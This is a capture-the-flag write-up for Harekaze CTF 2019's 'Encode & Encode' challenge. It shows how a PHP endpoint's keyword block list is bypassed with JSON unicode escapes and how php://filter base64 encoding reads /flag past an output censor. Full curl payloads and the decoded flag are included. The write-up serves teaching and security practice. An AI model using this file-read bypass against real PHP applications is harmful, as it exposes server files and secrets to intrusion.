harekaze ctf – encode & encode
(Part of a series of writeups from Harekaze CTF 2019.)
The challenge text reads:
I made a strong WAF, so you definitely can’t read the flag!
We are given the source code, a link to the website, and a subtle hint.
$ tree
.
├── chall
│ ├── index.html
│ ├── pages
│ │ ├── about.html
│ │ └── lorem.html
│ └── query.php
├── Dockerfile
└── php.ini
2 directories, 6 files
The Dockerfile
is the environment the webapp runs in so it's worth taking a look at first.
FROM php:7.3-apache
COPY ./php.ini $PHP_INI_DIR/php.ini
COPY ./chall /var/www/html
RUN echo "HarekazeCTF{<redacted>}" > /flag
EXPOSE 80
The RUN ... > /flag
line tells us that the flag is in a file called flag
at the root of the filesystem, a handy thing to know.
Clicking on the link reveals beautiful modern design.
JavaScript on the index.html
page intercepts clicks to About and Lorem Ipsum and performs a JSON POST
request to query.php
, asking for the contents of page
.
window.addEventListener('DOMContentLoaded', () => {
let content = document.getElementById('content');
for (let link of document.getElementsByClassName('link')) {
link.addEventListener('click', () => {
fetch('query.php', {
'method': 'POST',
'headers': {
'Content-Type': 'application/json'
},
'body': JSON.stringify({
'page': link.href.split('#')[1]
})
}).then(resp => resp.json()).then(resp => {
content.innerHTML = resp.content;
})
return false;
}, false);
}
}, false);
On the server side, query.php
handles the request and serves the response with a suspicious-looking call to file_get_contents
.
<?php
error_reporting(0);
if (isset($_GET['source'])) {
show_source(__FILE__);
exit();
}
function is_valid($str) {
$banword = [
// no path traversal
'\.\.',
// no stream wrapper
'(php|file|glob|data|tp|zip|zlib|phar):',
// no data exfiltration
'flag'
];
$regexp = '/' . implode('|', $banword) . '/i';
if (preg_match($regexp, $str)) {
return false;
}
return true;
}
$body = file_get_contents('php://input');
$json = json_decode($body, true);
if (is_valid($body) && isset($json) && isset($json['page'])) {
$page = $json['page'];
$content = file_get_contents($page);
if (!$content || !is_valid($content)) {
$content = "<p>not found</p>\n";
}
} else {
$content = '<p>invalid request</p>';
}
// no data exfiltration!!!
$content = preg_replace('/HarekazeCTF\{.+\}/i',
'HarekazeCTF{<censored>}', $content);
echo json_encode(['content' => $content]);
PHP has a habit of doing too much at once, leading to innocent code doing something unexpected. PHP's stream, protocol, and fopen wrappers are often culprits. Generally, if untrusted input can find its way into file_get_contents
, you are probably in trouble.
Despite the author's attempts to mitigate path traversal and data exfiltration, they've made some fatal errors that will ultimately lead us to steal the flag.
Our eyes are drawn to the following sloppiness.
$body = file_get_contents('php://input');
$json = json_decode($body, true);
if (is_valid($body) && isset($json) && isset($json['page'])) {
$page = $json['page'];
$content = file_get_contents($page);
// ...
}
The issue here is premature validation. The is_valid
function is applied to $body
before it goes through json_decode
, not afterwards.
JSON decoding involves processing escape sequences, so if escape sequences can be used to obfuscate the input then the validation code will be bypassed without affecting the final (decoded) string.
Let's look at the JSON specification's definition for a string.
JSON supports unicode escapes of the form \uXXXX
, where XXXX
is the 4 hex digits representing the unicode code point of the character.
For example the letter A
is 0x41
and represented as \u0041
.
$ echo '{ "page": "\u0041\u0041\u0041\u0041" }' | jq
{
"page": "AAAA"
}
The tool uni2ascii
can convert ASCII text to unicode escapes.
$ echo '/flag' | uni2ascii -qpa L
\u002F\u0066\u006C\u0061\u0067
Armed with our obfuscated payload, all that's left to do is POST
off the request to read /flag
, and we should be done.
$ curl -X POST \
-d "{\"page\":\"\u002F\u0066\u006C\u0061\u0067\"}" \
-H 'Content-Type: application/json' \
$HOST/query.php
{"content":"HarekazeCTF{<censored>}\n"}
Oh, wait, there's that part of the code that filters the content on the way out.
// no data exfiltration!!!
$content = preg_replace(
'/HarekazeCTF\{.+\}/i',
'HarekazeCTF{<censored>}',
$content
);
As mentioned earlier, where there's untrusted user input to file_get_contents
, there's room for PHP to add a stream wrapper that can do crazy things that happen to help us in unexpected ways.
A little bit of research revealed that there is a wrapper called php://filter
that can not only read files, but also convert them to base64 strings!
php://filter
is a kind of meta-wrapper designed to permit the application of filters to a stream at the time of opening. This is useful with all-in-one file functions such asreadfile()
,file()
, andfile_get_contents()
where there is otherwise no opportunity to apply a filter to the stream prior the contents being read.
Useful.
So, the final payload becomes...
php://filter/convert.base64-encode/resource=/flag
When this is directly passed to file_get_contents
, PHP will read /flag
and convert it to a base64 encoded string thus bypassing the final layer of protection.
$ curl -X POST \
-d "{\"page\":\"\u0070\u0068\u0070\u003A\u002F\u002F\u0066\u0069\u006C\u0074\u0065\u0072\u002F\u0063\u006F\u006E\u0076\u0065\u0072\u0074\u002E\u0062\u0061\u0073\u0065\u0036\u0034\u002D\u0065\u006E\u0063\u006F\u0064\u0065\u002F\u0072\u0065\u0073\u006F\u0075\u0072\u0063\u0065\u003D\u002F\u0066\u006C\u0061\u0067\"}" \
-H 'Content-Type: application/json' \
$DOMAIN/query.php
{"content":"SGFyZWthemVDVEZ7dHVydXRhcmFfdGF0dGF0dGFfcml0dGF9Cg=="}
The response is base64 encoded.
$ echo 'SGFyZWthemVDVEZ7dHVydXRhcmFfdGF0dGF0dGFfcml0dGF9Cg==' | base64 -d
HarekazeCTF{turutara_tattatta_ritta}